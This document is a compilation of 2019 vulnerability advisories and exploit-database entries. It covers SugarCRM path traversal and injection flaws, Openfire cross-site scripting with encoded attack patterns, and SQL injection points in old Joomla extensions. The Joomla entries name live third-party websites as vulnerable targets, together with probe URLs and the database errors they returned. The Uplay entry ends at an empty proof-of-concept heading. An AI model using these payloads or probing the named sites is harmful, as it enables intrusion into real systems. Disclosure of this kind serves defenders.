---------------------------------------------------------
SugarCRM <= 9.0.1 Multiple Path Traversal Vulnerabilities
---------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) User input passed to the "/Mail/attachment" REST API endpoint is not 
properly
sanitized before being used to delete a file from the system. This can 
be exploited
by malicious users to delete arbitrary files via Path Traversal attacks. 
Please
note this vulnerability could be exploited to delete the 'config.php'
file and
re-install the application, potentially leading to a full server 
compromise.

2) User input passed through the "temp_id" parameter to the 
"/[module]/temp/file"
REST API endpoint is not properly sanitized before being used to 
download/delete a
file from the system. This can be exploited by malicious users to 
download and/or
delete arbitrary files via Path Traversal attacks. Please note this 
vulnerability
could be exploited to download and delete the 'config.php' file and 
re-install
the application, potentially leading to a full server compromise.

3) User input passed through the "dropdown_lang" parameter when handling 
the "wizard"
action within the "Studio" module is not properly sanitized before being 
used in a
call to the include() PHP function. This can be exploited by malicious 
users to upload
and execute arbitrary PHP code via Path Traversal attacks. Successful 
exploitation
of this vulnerability requires an user account with Developer access to 
any module.

4) User input passed through the "filename" parameter when handling the 
"deleteFont"
action within the "Configurator" module is not properly sanitized before 
being used
to delete a file from the system. This can be exploited by malicious 
users to delete
arbitrary files. Please note this vulnerability could be exploited to 
delete the
'config.php' file and re-install the application, potentially leading to 
a full
server compromise. Successful exploitation of this vulnerability 
requires a
System Administrator account.


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-06


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes

-------------------------------------------------------------
SugarCRM <= 9.0.1 Multiple PHP Code Injection Vulnerabilities
-------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) When handling the "Locale" action within the "Administration" module 
the application
allows to inject arbitrary settings into the 'config_override.php' file. 
This can be
exploited by malicious users to inject and execute arbitrary PHP code by 
e.g. setting
to .php the file extension for the system log file. Successful 
exploitation of this
vulnerability requires a System Administrator account.

2) When handling the "SaveRelationship" action within the 
"ModuleBuilder" module the
application allows to inject arbitrary settings into the 
'config_override.php' file.
This can be exploited by malicious users to inject and execute arbitrary 
PHP code
by e.g. setting to .php the file extension for the system log file.

3) When handling the "PasswordManager" action within the 
"Administration" module the
application allows to inject arbitrary settings into the 
'config_override.php' file.
This can be exploited by malicious users to inject and execute arbitrary 
PHP code
by e.g. setting to .php the file extension for the system log file. 
Successful
exploitation of this vulnerability requires a System Administrator 
account.

4) When handling the "saveadminwizard" action within the "Configurator"
module the
application allows to inject arbitrary settings into the 
'config_override.php' file.
This can be exploited by malicious users to inject and execute arbitrary 
PHP code by
e.g. setting to .php the file extension for the system log file. 
Successful
exploitation of this vulnerability requires a System Administrator 
account.

5) When handling the "trackersettings" action within the "Trackers"
module the
application allows to inject arbitrary settings into the 
'config_override.php' file.
This can be exploited by malicious users to inject and execute arbitrary 
PHP code by
e.g. setting to .php the file extension for the system log file.

6) When handling the "updatewirelessenabledmodules" action within the 
"Administration"
module the application allows to inject arbitrary settings into the 
'config_override.php'
file. This can be exploited by malicious users to inject and execute 
arbitrary PHP code
by e.g. setting to .php the file extension for the system log file. 
Successful
exploitation of this vulnerability requires a System Administrator 
account.


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-07


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes

---------------------------------------------------------------
SugarCRM <= 9.0.1 Multiple PHP Object Injection Vulnerabilities
---------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) The vulnerability exists because the "/modules/Emails/DetailView.php"
script
is using the unserialize() function with the "campaign_data" field of 
the table,
and such a value can be arbitrarily manipulated through the "save2"
action. This
can be exploited by malicious users to inject arbitrary PHP objects into 
the
application scope (PHP Object Injection), allowing them to carry out a 
variety
of attacks, such as executing arbitrary PHP code.

2) The vulnerability exists because the 
"/modules/EmailMan/views/view.config.php"
script is using the unserialize() function with the 
"$sugar_config['email_xss']"
variable, and such a value can be arbitrarily manipulated through the 
"Configurator"
module. This can be exploited by malicious users to inject arbitrary PHP 
objects
into the application scope (PHP Object Injection), allowing them to 
carry out a
variety of attacks, such as executing arbitrary PHP code. Successful 
exploitation
of this vulnerability requires a System Administrator account.

3) User input passed through the "ext4" parameter when handling the 
"RefreshField"
action within the "ModuleBuilder" module (when the "type" parameter is 
set to "enum")
is not properly sanitized before being used in a call to the 
unserialize() function.
This can be exploited by malicious users to inject arbitrary PHP objects 
into the
application scope (PHP Object Injection), allowing them to carry out a 
variety of
attacks, such as executing arbitrary PHP code. Successful exploitation 
of this
vulnerability requires an user account with Developer access to any 
module.

4) User input passed through the "ext4" parameter when handling the 
"RefreshField"
action within the "ModuleBuilder" module (when the "type" parameter is 
set to
"multienum") is not properly sanitized before being used in a call to 
the unserialize()
function. This can be exploited by malicious users to inject arbitrary 
PHP objects into
the application scope (PHP Object Injection), allowing them to carry out 
a variety of
attacks, such as executing arbitrary PHP code. Successful exploitation 
of this
vulnerability requires an user account with Developer access to any 
module.

5) The vulnerability exists because the 
"SubPanelDefinitions::get_hidden_subpanels()"
method is using the unserialize() function with the 
"MySettings_hide_subpanels" setting
variable, and such a value can be arbitrarily manipulated through the 
"MergeRecords"
module. This can be exploited by malicious users to inject arbitrary PHP 
objects into
the application scope (PHP Object Injection), allowing them to carry out 
a variety of
attacks, such as executing arbitrary PHP code.

6) The vulnerability exists because the 
"TabController::get_system_tabs()" method is
using the unserialize() function with the "MySettings_tab" setting 
variable, and such
a value can be arbitrarily manipulated through the "MergeRecords"
module. This can be
exploited by malicious users to inject arbitrary PHP objects into the 
application
scope (PHP Object Injection), allowing them to carry out a variety of 
attacks, such
as executing arbitrary PHP code.

7) The vulnerability exists because the 
"OpportunitySetup::setConfigSetting()" method
is using the unserialize() function with the "MySettings_hide_subpanels"
setting variable,
and such a value can be arbitrarily manipulated through the 
"MergeRecords" module. This
can be exploited by malicious users to inject arbitrary PHP objects into 
the application
scope (PHP Object Injection), allowing them to carry out a variety of 
attacks,
such as executing arbitrary PHP code.

8) The vulnerability exists because the 
"PackageManager::getinstalledPackages()" method
is using the unserialize() function with the "manifest" field of the 
'upgrade_history'
table, and such a value can be arbitrarily manipulated through the 
"MergeRecords" module.
This can be exploited by malicious users to inject arbitrary PHP objects 
into the
application scope (PHP Object Injection), allowing them to carry out a 
variety of
attacks, such as executing arbitrary PHP code. Successful exploitation 
of this
vulnerability requires a System Administrator account.

9) The vulnerability exists because the 
"UpgradeSavedSearch::__construct()" method is
using the unserialize() function with the "contents" field of the 
'saved_search' table,
and such a value can be arbitrarily manipulated through the 
"MergeRecords" module.
This can be exploited by malicious users to inject arbitrary PHP objects 
into the
application scope (PHP Object Injection), allowing them to carry out a 
variety of
attacks, such as executing arbitrary PHP code.

10) The vulnerability exists because the 
"UserPreference::reloadPreferences()" method
is using the unserialize() function with the "contents" field of the 
'user_preferences'
table, and such a value can be arbitrarily manipulated through the 
"MergeRecords" module.
This can be exploited by malicious users to inject arbitrary PHP objects 
into the
application scope (PHP Object Injection), allowing them to carry out a 
variety of
attacks, such as executing arbitrary PHP code.

11) The vulnerability exists because the "TeamSetManager::cleanUp()"
method is using the
unserialize() function with the "contents" field of the 
'user_preferences' table, and
such a value can be arbitrarily manipulated through the "MergeRecords"
module. This can
be exploited by malicious users to inject arbitrary PHP objects into the 
application
scope (PHP Object Injection), allowing them to carry out a variety of 
attacks, such
as executing arbitrary PHP code. Successful exploitation of this 
vulnerability requires
an user account with Admin access to the Users/Teams/Roles modules.

12) User input passed through the "$_FILES['VKFile']" parameter when 
handling the
"LicenseSettings" action within the "Administration" module is not 
properly sanitized
before being used in a call to the unserialize() function within the 
"check_now()"
function. This can be exploited by malicious users to inject arbitrary 
PHP objects
into the application scope (PHP Object Injection), allowing them to 
carry out a variety
of attacks, such as executing arbitrary PHP code. Successful 
exploitation of this
vulnerability requires a System Administrator account.

13) The vulnerability exists because the 
"/modules/Administration/Updater.php" script
is using the unserialize() function with the "license_latest_versions"
setting variable,
and such a value can be arbitrarily manipulated in different ways. This 
can be exploited
by malicious users to inject arbitrary PHP objects into the application 
scope (PHP
Object Injection), allowing them to carry out a variety of attacks,
such as executing arbitrary PHP code.

14) The vulnerability exists because the 
"/modules/Administration/metadata/adminpaneldefs.php"
script is using the unserialize() function with the 
"license_latest_versions" setting
variable, and such a value can be arbitrarily manipulated in different 
ways. This can
be exploited by malicious users to inject arbitrary PHP objects into the 
application
scope (PHP Object Injection), allowing them to carry out a variety of 
attacks,
such as executing arbitrary PHP code.

15) The vulnerability exists because the "authenticateDownloadKey()"
function is using the
unserialize() function with the "license_validation_key" setting 
variable, and such a value
can be arbitrarily manipulated in different ways. This can be exploited 
by malicious users
to inject arbitrary PHP objects into the application scope (PHP Object 
Injection), allowing
them to carry out a variety of attacks, such as executing arbitrary PHP 
code.


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-08


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes

---------------------------------------------------------------
SugarCRM <= 9.0.1 Multiple Phar Deserialization Vulnerabilities
---------------------------------------------------------------


[-] Software Link:

https://www.sugarcrm.com


[-] Affected Versions:

Version 9.0.1 and prior versions, 8.0.3 and prior versions.


[-] Vulnerabilities Description:

1) User input passed through the "backup_dir" parameter when handling 
the
"Backups" action within the "Administration" module is not properly 
sanitized
before being used in a file operation. This can be exploited by 
malicious users
to inject arbitrary PHP objects into the application scope (PHP Object 
Injection
via phar:// stream wrapper), allowing them to carry out a variety of 
attacks,
such as executing arbitrary PHP code. Successful exploitation of this
vulnerability requires a System Administrator account.

2) User input passed through the "file_name" parameter when handling the 
"step3"
action within the "Import" module is not properly sanitized before being 
used in
a file operation. This can be exploited by malicious users to inject 
arbitrary
PHP objects into the application scope (PHP Object Injection via phar:// 
stream
wrapper), allowing them to carry out a variety of attacks, such as 
executing
arbitrary PHP code.

3) User input passed through the "importFile" parameter when handling 
the
"RefreshMapping" action within the "Import" module is not properly 
sanitized
before being used in a file operation. This can be exploited by 
malicious users
to inject arbitrary PHP objects into the application scope (PHP Object 
Injection
via phar:// stream wrapper), allowing them to carry out a variety of 
attacks,
such as executing arbitrary PHP code.

4) User input passed through the "load_module_from_dir" parameter when 
handling
the "UpgradeWizard" action within the "Administration" module is not 
properly
sanitized before being used in a file operation. This can be exploited 
by malicious
users to inject arbitrary PHP objects into the application scope (PHP 
Object
Injection via phar:// stream wrapper), allowing them to carry out a 
variety of
attacks, such as executing arbitrary PHP code. Successful exploitation 
of this
vulnerability requires a System Administrator account.

5) User input passed through the "file_name" parameter when handling the
"UploadFileCheck" action within the "UpgradeWizard" module is not 
properly
sanitized before being used in a file operation. This can be exploited 
by
malicious users to inject arbitrary PHP objects into the application 
scope
(PHP Object Injection via phar:// stream wrapper), allowing them to 
carry
out a variety of attacks, such as executing arbitrary PHP code.


[-] Solution:

Upgrade to version 9.0.2, 8.0.4, or later.


[-] Disclosure Timeline:

[07/02/2019] - Vendor notified
[01/10/2019] - Versions 9.0.2 and 8.0.4 released
[10/10/2019] - Publication of this advisory


[-] Credits:

Vulnerabilities discovered by Egidio Romano.


[-] Original Advisory:

http://karmainsecurity.com/KIS-2019-09


[-] Other References:

https://support.sugarcrm.com/Documentation/Sugar_Versions/9.0/Ent/Sugar_9.0.2_Release_Notes

Information
--------------------

Advisory by Netsparker
Name: Multiple Cross-site Scripting Vulnerabilities in Openfire 4.4.1
Affected Software: Openfire
Affected Versions: 4.4.1
Vendor Homepage: https://www.igniterealtime.org/
Vulnerability Type: Cross-site Scripting
Severity: Medium
Status: Fixed
CVSS Score (3.0): AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Netsparker Advisory Reference: NS-19-015

Technical Details
--------------------

URL  : http://{DOMAIN}/setup/setup-datasource-standard.jsp
Parameter Name  : driver
Parameter Type  : POST
Attack Pattern  : x%22+onmouseover%3dnetsparker(0x003276)+x%3d%22

URL  : http://{DOMAIN}/setup/setup-datasource-standard.jsp
Parameter Name  : password
Parameter Type  : POST
Attack Pattern  : x%22+onmouseover%3dnetsparker(0x003403)+x%3d%22

URL  : http://{DOMAIN}/setup/setup-datasource-standard.jsp
Parameter Name  : serverURL
Parameter Type  : POST
Attack Pattern  : x%22+onmouseover%3dnetsparker(0x0033A0)+x%3d%22

URL  : http://{DOMAIN}/setup/setup-datasource-standard.jsp
Parameter Name  : username
Parameter Type  : POST
Attack Pattern  : x%22+onmouseover%3dnetsparker(0x003213)+x%3d%22

For more information:
https://www.netsparker.com/web-applications-advisories/ns-19-015-reflected-cross-site-scripting-in-openfire/


Regards,

Daniel Bishtawi
Marketing Administrator | Netsparker Web Application Security Scanner
Follow us on Twitter <https://twitter.com/netsparker> | LinkedIn
<https://www.linkedin.com/company/netsparker-ltd> | Facebook
<https://facebook.com/netsparker>

###################################################################

# Exploit Title : Joomla SwPhotoGallery 1.5.26 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : joomla.org
# Affected Versions : 1.5.16 and 1.5.26
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla SWPhotoGallery is prone to an SQL-injection vulnerability because 
it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access or 
modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_swphotogallery&lang=fr&location=[SQL Injection]

/index.php?option=com_swphotogallery&lang=dk&location=[SQL Injection]&view=gallery

###################################################################

# Example Vulnerable Sites :
*************************
[+] madeira-live.com/index.php?option=com_swphotogallery&lang=fr&location=1%27

###################################################################

# Example SQL Database Error :
****************************
No valid database connection You have an error in your SQL syntax; check the
 manual that corresponds to your MySQL server version for the right syntax to 
use near ''' at line 1 SQL=SELECT alias FROM `jos_swphotogallery_locations` 
WHERE `id` = 1

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

###################################################################

# Exploit Title : Joomla 1.5.15 Cactus 1.2.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : anatoliasystems.com
Joomla Affected Versions : 1.5.4 and 1.5.15
Software Affected Version : 1.2.0
/administrator/components/com_cactus/com_cactus.xml
Software Information Links : 
joomlacode.org/gf/project/cactus/
100cms.org/extension/joomla/2559-Cactus
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Description about Software :
***************************
Cactus is practical, comfortable, fast and simple picture gallery component for Joomla.

###################################################################

# Impact :
***********
Joomla Cactus is prone to an SQL-injection vulnerability because 
it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access or 
modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_cactus&album=[SQL Injection]

/index.php?option=com_cactus&album=[ID-NUMBER]&limit=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
[+] indusfonte.com/site/index.php?option=com_cactus&album=1%27

[+] elena-artstudio.de/index.php?option=com_cactus&album=1%27

###################################################################

# Example SQL Database Error :
****************************
No valid database connection You have an error in your SQL syntax; check the manual 
that corresponds to your MariaDB server version for the right syntax to use near 'ORDER 
BY jos_cactus.line LIMIT 0,9' at line 13 SQL=SELECT jos_cactus.id, jos_cactus.name,
 jos_cactus.caption, jos_cactus_album.path, jos_cactus_album.vpath, jos_cactus_album.
tpath FROM jos_cactus, jos_cactus_album WHERE jos_cactus.albumid = jos_cactus_
album.id AND jos_cactus_album.publish = 1 AND jos_cactus.publish = 1 AND 
jos_cactus.albumid = ORDER BY jos_cactus.line LIMIT 0,9

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

###################################################################

# Exploit Title : Joomla 1.5.26 Mad4Joomla 1.1.x SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : mad4media.de
# Joomla Affected Versions : 1.5.16/1.5.18-1.5.26
# Software Affected Versions : 1.1.1 - 1.1.2 - 1.1.3 - 1.1.4 - 1.1.5 - 1.1.6 - 1.1.7 - 1.1.8.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla Mad4Joomla is prone to an SQL-injection vulnerability because 
it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access or 
modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_mad4joomla&jid=[SQL Injection]

/index.php?option=com_mad4joomla&jid=[ID-NUMBER]&Itemid=[SQL Injection]&lang=fr

###################################################################

# Example Vulnerable Sites :
*************************
[+] cardliberia.org/index.php?option=com_mad4joomla&jid=1&Itemid=1%27&lang=fr

###################################################################

# Example SQL Database Error :
****************************
No valid database connection Table 'c695_card_prd.jos_m4j_forms' doesn't exist 
SQL=SELECT question_width as left_col, answer_width as right_col, use_help 
FROM jos_m4j_forms WHERE fid = ''

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

###################################################################

# Exploit Title : Joomla 1.5.26 Google Maps 1.0.4 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : mapdemo.110mb.com - joomla.org
# Joomla Affected Version : 1.5.16 and 1.5.26
# Software Affected Version : 1.0.4
# Owner of the Script : Lanari 
# Script Owner E-Mail Address : joomla@unlimitedmail.org
/administrator/components/com_google_maps/com_google_maps.xml
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla Google Maps is prone to an SQL-injection vulnerability because 
it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access or 
modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?category=&zipcode=[ID-NUMBER]&option=com_google_maps&Itemid=[SQL Injection]&reftype=fr

/index2.php?option=com_google_maps&Itemid=[ID-NUMBER]&reftype=fr&print=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
[+] valab.com/index.php?category=&zipcode=22&option=com_google_maps&Itemid=1%27&reftype=fr

###################################################################

# Example SQL Database Error :
****************************
No valid database connection Table 'valab_bdd.val_detailChamps'
doesn't exist SQL=SELECT * FROM `val_detailChamps` where raccoursis='PRIVE'

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

###################################################################

# Exploit Title : Joomla MisterEstate 1.5.26 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : misterestate.com
# Affected Versions : 1.5.12/1.5.14/1.5.16/1.5.18/1.5.26
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla MisterEstate is prone to an SQL-injection vulnerability because 
it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access or 
modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_misterestate&view=search&task=showMESR&Itemid=[SQL Injection]&lang=en

###################################################################

# Example Vulnerable Sites :
*************************
[+] sabatinimmobiliare.com/index.php?option=com_misterestate&view=search&task=showMESR&Itemid=3%27&lang=en

[+] villeecasalinetwork.com/index.php?option=com_misterestate&view=search&task=showMESR&Itemid=3%27&lang=en

###################################################################

# Example SQL Database Error :
****************************
No valid database connection You have an error in your SQL syntax; check the manual 
that corresponds to your MySQL server version for the right syntax to use near 'LIMIT 
0,25' at line 1 SQL=SELECT * FROM jos_misterestate WHERE LIMIT 0,25

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

###################################################################

# Exploit Title : Joomla MediaLibrary 1.5.26 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : ordasoft.com
# Software Information Link : ordasoft.com/media-library-joomla-extension
# Software Affected Versions : 1.0- 4.0.12
# Joomla Affected Versions : 1.5.16/1.5.18-1.5.26
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla MediaLibrary is prone to an SQL-injection vulnerability because 
it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access or 
modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_medialibrary&task=view&id=[ID-NUMBER]&catid=[ID-NUMBER]&Itemid=[SQL Injection]&lang=en

###################################################################

# Example Vulnerable Sites :
*************************
[+] caachen.de/index.php?option=com_medialibrary&task=view&id=98&catid=89&Itemid=1%27&lang=en

###################################################################

# Example SQL Database Error :
****************************
No valid database connection Table 'caachen_de_joomla
.jos_medialibrary_review' doesn't exist SQL=SELECT id FROM
 jos_medialibrary_review WHERE fk_mediaid='98' ORDER BY id

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

###################################################################

# Exploit Title : Joomla Vemod News Mailer 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : vemod.unimatrix.net
# Software Affected Version : 1.0 - 1.5
/administrator/components/com_vemod_news_mailer/versioncompat.php
/administrator/components/com_vemod_news_mailer/toolbar.vemod_news_mailer.php
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla Vemod News Mailer  is prone to an SQL-injection vulnerability because 
it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access or 
modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/index.php?option=com_vemod_news_mailer&Itemid=[ID-NUMBER]&unsubscribeall=[ID-NUMBER]&userid=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
[+] labatut-riviere.fr/index.php?option=com_vemod_news_mailer&Itemid=130&unsubscribeall=1&userid=1%27

###################################################################

# Example SQL Database Error :
****************************
No valid database connection Invalid utf8 character string: '\xAE'
SQL=SELECT * FROM jos_users WHERE id= LIMIT 1

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

##################################################################

# Exploit Title : Joomla Sumoku 3.9.8 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/10/2019
# Vendor Homepage : blueorangegames.com/sumoku/
# Affected Version : 3.9.8
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of 
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Impact :
***********
Joomla Sumoku is prone to an SQL-injection vulnerability because 
it fails to sufficiently sanitize user-supplied data before using it in an SQL query. 
Exploiting this issue could allow an attacker to compromise the application, access or 
modify data, or exploit latent vulnerabilities in the underlying database. 
A remote attacker can send a specially crafted request to the vulnerable application and 
execute arbitrary SQL commands in application`s database. Further exploitation of this 
vulnerability may result in unauthorized data manipulation. 
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# SQL Injection Exploit :
**********************
/sumoku/index.php?option=com_sumoku&Itemid=[SQL Injection]&lang=fr

###################################################################

# Example Vulnerable Sites :
*************************
[+] blueorangegames.com/sumoku/index.php?option=com_sumoku&Itemid=1%27&lang=fr

###################################################################

# Example SQL Database Error :
****************************
No valid database connection You have an error in your SQL syntax; check the
 manual that corresponds to your MySQL server version for the right syntax to use 
near '' at line 3 SQL=SELECT a.* FROM jossumoku_sumoku AS a WHERE 
a.published = 1 AND a.id =

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

###################################################################

# Exploit Title: Uplay 92.0.0.6280 - Local Privilege Escalation
# Date: 2019-08-07
# Exploit Author: Kusol Watchara-Apanukorn, Pongtorn Angsuchotmetee, Manich Koomsusi
# Vendor Homepage: https://uplay.ubisoft.com/
# Version: 92.0.0.6280
# Tested on: Windows 10 x64
# CVE : N/A

# Vulnerability Description: "C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher" has in secure permission 
# that allows all BUILTIN-USER has full permission. An attacker replace the 
# vulnerability execute file with malicious file.

///////////////////////
   Proof of Concept
///////////////////////

